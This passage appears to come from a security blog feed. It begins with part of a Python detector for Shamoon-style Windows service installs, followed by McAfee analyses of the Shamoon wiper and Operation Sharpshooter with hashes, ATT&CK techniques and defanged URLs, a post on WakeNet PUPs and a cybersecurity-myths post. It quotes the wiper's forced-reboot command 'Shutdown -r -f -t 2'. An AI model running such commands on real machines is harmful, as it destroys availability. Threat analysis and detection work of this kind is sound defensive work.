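    if "kernel" in ev["stype"].lower() and "\\drivers\\" not in image:
        # Legitimate drivers almost always live under System32\drivers.
        reasons.append("kernel-driver-outside-drivers-dir")
    return reasons


def scan(lines) -> List[Tuple[str, List[str]]]:
    """Parse each line and keep the services that raised at least one reason."""
    hits = []
    for line in lines:
        ev = parse_7045(line)
        if ev is not None:
            reasons = assess(ev)
            if reasons:
                hits.append((ev["name"].strip(), reasons))
    return hits


# Constructed sample events: the two Shamoon installs, a benign driver
# install, and an unrelated 7036 state-change event.
SAMPLE_LOG = [
    "7045 Service Name: MaintenaceSrv Service File Name: "
    "C:\\windows\\system32\\MaintenaceSrv64.exe LocalService "
    "Service Type: user mode service Service Start Type: auto start "
    "Service Account: LocalSystem",
    "7045 Service Name: hdv_725x Service File Name: WINDOWS\\hdv_725x.sys "
    "Service Type: kernel mode driver Service Start Type: demand start "
    "Service Account: ",
    "7045 Service Name: ExampleDrv Service File Name: "
    "System32\\drivers\\exampledrv.sys Service Type: kernel mode driver "
    "Service Start Type: demand start Service Account: ",
    "7036 Service Name: Spooler entered the running state.",
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_LOG):
        print(f"{name}: {', '.join(reasons)}")
```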


The following screenshot shows the execution of this command:


The malware overwrites every file in c:\Windows\System32, placing the machine in a critical state. All the files on the system are overwritten.

The overwriting process:

Finally, it forces the reboot with the following command:

Shutdown -r -f -t 2


Once the system is rebooted it shows a blue screen:


The worm component is extracted from the resources from the dropper. Destructive malware usually uses spreading techniques to infect machines as quickly as possible.

The worm component can take the following names:

We noticed the capability to scan for the local network and connect to a potential control server:

Although the worm component can spread the dropper and connect to a remote server, the component was not used in this version.


Aside from the major destruction this malware can cause, the wiper component can be used independently from the dropper. The wiper does not have to rely on the main stub process. The 2018 Shamoon variant’s functionality indicates modular development. This enables the wiper to be used by malware droppers other than Shamoon.

Shamoon is showing signs of evolution; however, these advancements did not escape detection by McAfee DATs. We expect to see additional attacks in the Middle East (and beyond) by these adversaries. We will continue to monitor our telemetry and will update this analysis as we learn more.

MITRE ATT&CK™ matrix

Indicators of compromise

  • df177772518a8fcedbbc805ceed8daecc0f42fed: Original dropper x86
  • ceb7876c01c75673699c74ff7fac64a5ca0e67a1: Wiper
  • 10411f07640edcaa6104f078af09e2543aa0ca07: Worm module
  • bf3e0bc893859563811e9a481fde84fe7ecd0684: RawDisk driver


McAfee detection

  • Trojan-Wiper!DE07C4AC94A5
  • RDN/Generic.dx
  • Trojan-Wiper

The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs.

‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure

This post was written with contributions from the McAfee Advanced Threat Research team.

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.



Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.


Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection


Control servers


Document URLs

  • hxxp:// Planning Manager.doc
  • hxxp:// Intelligence Administrator.doc
  • hxxp:// Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC


The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

Software Company WakeNet AB Discovered Spreading PUPs to Users

Pay-per-install, or PPI for short, is a type of software program that presents users with third-party offers while they are in the middle of another download. If a user clicks on the third-party advertisement, the software developer earns money from the download. One specific PPI program has caught the attention of our McAfee ATR team, as they recently investigated a company that has taken advantage of this software and is using deceptive techniques to spread malicious files. Meet WakeNet AB, a Swedish pay-per-install software developer that has generated a large amount of revenue – even more so than some of the most prevalent ransomware families – from spreading PUPs (potentially unwanted programs).

So, how does WakeNet AB infect users’ devices with PUPs? WakeNet sets up PPI sites to entice affiliate hackers to spread malicious files and adware. WakeNet’s most recent distribution vessel is the site FileCapital. FileCapital provides affiliate hackers with a variety of “marketing tools” such as embedded movies, landing pages, banners, and buttons. These deceptive tools are intended to coax victims into installing bundled applications that house different PUPs. Victims may install these applications because they are disguised as legitimate programs. For example, a user may think they are installing a helpful performance cleaner onto their computer. What they don’t know is that the “performance cleaner” is actually disguising other malicious files that could lead to irritating adverts and decreased computer performance.

As of now, it seems unlikely that PUP development will slow since it helps their distributors earn a considerable amount of money. With that said, it’s important now more than ever for users to be aware of the security risks involved with PUPs like the ones spread by WakeNet’s FileCapital. Check out the following tips to better protect yourself from this threat:

  • Click with caution. Be wary of pop-ups and websites asking you to click on items like movie playbacks and other software downloads. These items could infect your device with annoying adverts and malware.
  • Only download software from trusted sources. If you receive a pop-up asking you to update or install software, be vigilant. Adware and PUPs are often disguised as legitimate sites or software companies. Your best bet is to play it safe and go directly to the source when updating or installing new software.
  • Use robust security software. Using a security solution like McAfee Total Protection could help protect your device from exposure to PUPs that have been spread by WakeNet’s FileCapital. McAfee Total Protection blocks auto-play videos on websites that decrease computer performance and warns you of risky websites and links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Software Company WakeNet AB Discovered Spreading PUPs to Users appeared first on McAfee Blogs.

Busting 5 Cybersecurity Myths

It is no secret that many people nowadays do not pay much attention when they surf the web at home or at work. There are new data breaches and exploits on a daily basis, and still failing to take any precautions may result in catastrophic consequences. Even the biggest corporations are paying millions of dollars so they can improve their cybersecurity and remain safe. However, if you still believe in some of the cybersecurity myths, you may put your own computer or even your whole organization at huge risk. We at CyberDB have decided to bust the top 5 cybersecurity myths and make them clear for you.

Only the IT department is responsible for cybersecurity

It is not wrong to say that the IT department is responsible for implementing new processes and policies to keep cybersecurity in top-notch shape. However, they just don’t have a magic wand to protect all of the computers in the network. In reality each employee should be extremely careful when receiving and opening e-mail messages from colleagues or third parties. It is dangerous, since an infection can spread across all of the departments within the organization and may cause a further data breach, for example.

Using just an antivirus software is enough

Antivirus software might have been enough to save your business from a potential attack 20 years ago – nowadays it is definitely not enough to protect your whole organization. Hackers find new ways to disable your antivirus and hide their attacks in the system. With ransomware gaining more popularity among hackers, getting infected and having your information locked is just a matter of seconds. So using an antivirus is not always enough; you also need to stay informed about the latest threats. Check out our database of cybersecurity vendors to find the best solution for your personal or business needs.

A strong password is enough

It is no secret that having a long and complex password on your accounts is essential. However, even big tech giants like Facebook or Apple experience data breaches and are pretty often a target for hackers. Every website requires you to create a strong password, but it is also good to use two-factor authentication (2FA). Initially users received an SMS with a code for 2FA, but even this can be compromised by using a cloned SIM card. So make sure you use an app like Google Authenticator, for example, to make your accounts more secure.

Threats are being spread only through the Internet

Some users may think that disconnecting from the internet will prevent threats spreading around the network, but they are completely wrong. Just imagine what happens if an employee brings an infected flash drive and plugs it in: all of the computers may become infected and your company may lose valuable information. You may have your information stolen even when you shop at a local retailer. So threats are not only online but in our daily life, and we need to be very careful and take care of our personal information.

Only certain industries experience cyber attacks

Some businesses still believe that they may not be targeted by hackers because they are a small or mid-sized business or in a specific industry. Well, they are completely wrong. Some companies also believe they do not have anything that hackers may find valuable to steal. In reality there is information like personal addresses or credit card numbers which can make every business in every industry a potential target. Here are the industries which are most vulnerable to cyber-attacks nowadays:

Top 10 Sectors Breached

The post Busting 5 Cybersecurity Myths appeared first on CyberDB.